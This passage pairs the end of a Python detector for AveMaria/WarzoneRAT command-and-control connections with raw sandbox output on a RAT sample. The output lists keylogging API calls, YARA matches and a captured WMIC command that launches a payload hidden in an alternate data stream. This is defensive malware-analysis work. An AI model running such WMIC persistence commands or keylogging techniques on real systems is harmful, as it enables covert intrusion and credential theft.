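    findings = []
    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["type"] == "dns":
            resolved.update(ev["answers"])
            continue
        dst = ipaddress.ip_address(ev["dst"])
        reasons = []
        if literal and ev["dst"] == host and ev["dport"] == port:
            reasons.append("c2_config_match")
        if not is_local(dst):
            if ev["dst"] not in resolved:
                reasons.append("no_prior_dns")
            if ev["dport"] not in COMMON_PORTS:
                reasons.append("nonstandard_port")
        if reasons:
            findings.append((ev["sport"], ev["dst"], ev["dport"], tuple(reasons)))
    return findings


if __name__ == "__main__":
    for sport, dst, dport, reasons in analyze(EVENTS, AVEMARIA_CONFIG):
        print(f"sport {sport} -> {dst}:{dport}: {', '.join(reasons)}")
```

When the C2 field holds a hostname instead, a direct match on destination address is impossible and the no_prior_dns rule will not fire either, since the implant resolves the name first; config_endpoint reports which case applies so the caller can fall back to matching the DNS query name.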

          Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\ProgramData\images.exe | Windows user hook set: 0 keyboard low level C:\ProgramData\images.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D189D5 GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1902E DefWindowProcA,GetRawInputData,GetRawInputData,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrcpyW,CreateFileW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,CloseHandle,PostQuitMessage,RegisterRawInputDevices,

          E-Banking Fraud

          barindex
          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
          Source: 4.3.images.exe.75db48.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
          Source: 4.3.images.exe.75db48.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
          Source: 4.2.images.exe.22f89af.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
          Source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
          Source: WMIC.exe, 0000000D.00000002.288337503.000001B74FE00000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C:\Windows\System32\Wbem\WMIC.exewmic process call create '"C:\ProgramData:ApplicationData"'wmic process call create '"C:\ProgramData:ApplicationData"'Winsta0\Default
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_00415808
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_00412922
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_00412480
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_00416D23
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_004156DB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_0040B784
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D21BF8
          Source: C:\ProgramData\images.exe | Code function: 4_3_02F542D0
          Source: C:\ProgramData\images.exe | Code function: 4_3_02F91AA0
          Source: C:\ProgramData\images.exe | Code function: 4_3_02F86B50
          Source: C:\ProgramData\images.exe | Code function: 4_3_02F45AB0
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmi.dll
          Source: unknown | Driver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
          Source: Joe Sandbox View | Dropped File: C:\Program Files\Microsoft DN1\sqlmap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.3.images.exe.75db48.1.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.3.images.exe.75db48.1.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.3.images.exe.75db48.5.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.3.images.exe.75db48.5.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.5.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.5.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
